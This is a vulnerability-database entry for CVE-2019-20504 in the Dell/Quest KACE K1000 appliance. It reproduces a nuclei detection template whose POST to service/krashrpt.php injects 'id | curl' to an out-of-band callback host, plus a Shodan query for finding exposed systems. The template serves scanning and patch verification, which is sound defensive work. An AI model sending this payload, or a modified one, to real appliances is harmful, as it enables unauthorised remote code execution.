Dell KACE Systems Management Appliance (K1000) 6.4.120756 - Remote Code Execution

Published: 04 Jul 2026 03:00:48
Reported by: ProjectDiscovery
Type: nuclei
Source: github.com

Dell KACE K1000 6.4.120756 allows remote code execution via shell metacharacters in the kuid parameter of service/krashrpt.php.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| Circl | CVE-2019-20504 | 23 May 2025 21:02 | circl |
| CNVD | Quest Software KACE K1000 Systems Management Appliance Code Execution Vulnerability | 10 Mar 2020 00:00 | cnvd |
| CVE | CVE-2019-20504 | 9 Mar 2020 00:55 | cve |
| Cvelist | CVE-2019-20504 | 9 Mar 2020 00:55 | cvelist |
| NVD | CVE-2019-20504 | 9 Mar 2020 01:15 | nvd |
| OSV | CVE-2019-20504 | 9 Mar 2020 01:15 | osv |
| Prion | Code injection | 9 Mar 2020 01:15 | prion |
| RedhatCVE | CVE-2019-20504 | 22 May 2025 08:28 | redhatcve |
| UbuntuCve | CVE-2019-20504 | 6 Mar 2020 20:15 | ubuntucve |
| VulnCheck KEV | VulnCheck KEV: CVE-2019-20504 | 29 Jun 2024 00:00 | vulncheck_kev |

id: CVE-2019-20504

info:
  name: Dell KACE Systems Management Appliance (K1000) 6.4.120756 - Remote Code Execution
  author: DhiyaneshDk
  severity: critical
  description: |
    service/krashrpt.php in Quest KACE K1000 Systems Management Appliance before 6.4 SP3 (6.4.120822) allows a remote attacker to execute code via shell metacharacters in the kuid parameter.
  impact: |
    Unauthenticated attackers can execute arbitrary system commands via shell metacharacters, leading to complete server compromise and access to all managed systems.
  remediation: |
    Upgrade to KACE K1000 version 6.4 SP3 (6.4.120822) or later.
  reference:
    - https://www.exploit-db.com/exploits/46684
    - https://www.rcesecurity.com/2019/04/dell-kace-k1000-remote-code-execution-the-story-of-bug-k1-18652/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-20504
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-20504
    cwe-id: CWE-78
    epss-score: 0.0955
    epss-percentile: 0.94869
    cpe: cpe:2.3:a:quest:kace_systems_management:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: quest
    product: kace_systems_management
    shodan-query: html:"K1000 Logo"
  tags: cve,cve2019,k1000,kace,rce,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "K1000")'
        internal: true

  - raw:
      - |
        POST /service/krashrpt.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        kuid=id | curl http://{{interactsh-url}}

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
# digest: 4a0a00473045022100cf08776158004f46d41523eaa18cd82ee3e13885ff759bf7fbbd93714561243202202bfc052d6532bc72cb1144b48ce8f9456bf5ba3a6fc6ef84f032b63353e6600d:922c64590222798bb761d5b6d8e72950

Scores (04 Feb 2026 07:00, current):
Vulners AI Score: 7.4 (High risk)
CVSS 2: 7.5
CVSS 3.1: 9.8
EPSS: 0.0955